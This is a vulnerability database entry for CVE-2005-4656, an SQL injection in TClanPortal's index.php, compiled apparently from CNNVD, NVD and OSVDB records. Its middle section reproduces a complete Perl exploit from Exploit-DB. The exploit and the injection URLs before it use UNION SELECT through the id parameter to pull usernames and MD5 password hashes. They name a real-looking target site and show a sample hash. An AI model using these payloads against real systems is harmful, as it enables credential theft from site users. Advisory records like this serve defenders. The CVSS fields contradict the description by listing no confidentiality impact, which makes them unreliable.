CVE-2005-4656
CVSS 5.0
Published: 2005-12-31 00:00:00
Modified: 2011-03-07 21:28:45

[Original] SQL injection vulnerability in index.php in TClanPortal 1.1.3 and earlier allows remote attackers to execute arbitrary SQL commands, and retrieve all usernames and passwords, via the id parameter.


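[CNNVD] TriggerTG TClanPortal Index.PHP SQL injection vulnerability (CNNVD-200512-898)

        An SQL injection vulnerability exists in index.php in TClanPortal 1.1.3 and earlier. A remote attacker can execute arbitrary SQL commands and retrieve all usernames and passwords via the id parameter.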

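- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on the availability of the system]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4656
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4656
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-898
(official data source) CNNVD

- Other links and resources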

http://xforce.iss.net/xforce/xfdb/22869
(UNKNOWN)  XF  tclanportal-index-sql-injection(22869)
http://www.vupen.com/english/advisories/2005/2187
(UNKNOWN)  VUPEN  ADV-2005-2187
http://www.securityfocus.com/bid/15173
(UNKNOWN)  BID  15173
http://secunia.com/advisories/17324
(VENDOR_ADVISORY)  SECUNIA  17324
http://downloads.securityfocus.com/vulnerabilities/exploits/TClanPortal_sql_inj.pl
(UNKNOWN)  MISC  http://downloads.securityfocus.com/vulnerabilities/exploits/TClanPortal_sql_inj.pl
http://www.osvdb.org/20305
(UNKNOWN)  OSVDB  20305

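- Vulnerability information

TriggerTG TClanPortal Index.PHP SQL injection vulnerability
Medium severity  SQL injection
2005-12-31 00:00:00 2006-01-17 00:00:00
Remote
        An SQL injection vulnerability exists in index.php in TClanPortal 1.1.3 and earlier. A remote attacker can execute arbitrary SQL commands and retrieve all usernames and passwords via the id parameter.

- Advisories and patches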

        

- Vulnerability information (1273)

TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit (EDBID:1273)
php webapps
2005-10-26 Verified
0 Devil-00
N/A
# TClanPortal Version 3 ..
# Search By Google :-
# by TriggerTG.de 2003 - Version 3
#
# Gr33tz :-
#         Abducter .. SQL Injection's FOunder   - | abducter_minds76@hotmail.com |-
#         Devil-00 .. SQL Injection's Exploting - | devil-00@s4a.cc | -
#         Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P
#         HACKERS PAL ..
#         Yes2Hack ..
#         WwW.Sqor.NeT
#         WwW.S4a.Cc
#         WwW.SecurityGurus.NeT
#
#
#
# This Injection's Whene Prefix = "";
#
# 1- SQL Injection
# /ClanPortal/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=1/*
# http://yahzee.ya.funpic.de/ClanPortal/
#
# Richard
# d38b89019f0496a4e67bfbe95cbcba0f    - MD5
#
# 2- SQL Injection
# /linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20pw,null,null%20FROM%20member%20%20WHERE%20id=1/*
# [!] GET Password
#
#
# /linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20name,null,null%20FROM%20member%20%20WHERE%20id=1/*
# [!] GET Username
#
# [!] Perl Code By Devil-00 | devil-00@s4a.cc |
#------------------------------------------------------------------------------------------------------------

use LWP::Simple;

print "\n\n==========================================\n";
print "\n= Exploit for TClanPortal Version 3            ";
print "\n= Coded By Devil-00 | devil-00@s4a.cc |        ";
print "\n= Gr33tz :-                                                            ";
print "\n= Abducter .. SQL Injection's FOunder   - | abducter_minds76@hotmail.com |-            ";
print "\n= Devil-00 .. SQL Injection's Exploting - | devil-00@s4a.cc | -        ";
print "\n= Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P             ";
print "\n= HACKERS PAL ..                                                       ";
print "\n= Yes2Hack ..                                                          ";
print "\n= WwW.Sqor.NeT                                                         ";
print "\n= WwW.S4a.Cc                                                           ";
print "\n= WwW.SecurityGurus.NeT                                        ";
print "\n============================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
  print "Usage:\nperl $0 [Full-Path] [SQL Prefix] [User ID]\n\nExample:\nperl $0 http://yahzee.ya.funpic.de/ClanPortal/ 1\n";
  exit(0);
}
$url = "/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<a href='(.*?)' target='_parent'>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<b>Name:<\/b> <a href='index\.php\?action=kat&id=0'>(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-10-26]
		

- Vulnerability information

20305
TClanPortal index.php id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Unknown

- Vulnerability description

TClanPortal contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.php' script not properly sanitizing user-supplied input to the 'id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database.

- Timeline

2005-10-25 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

 

 
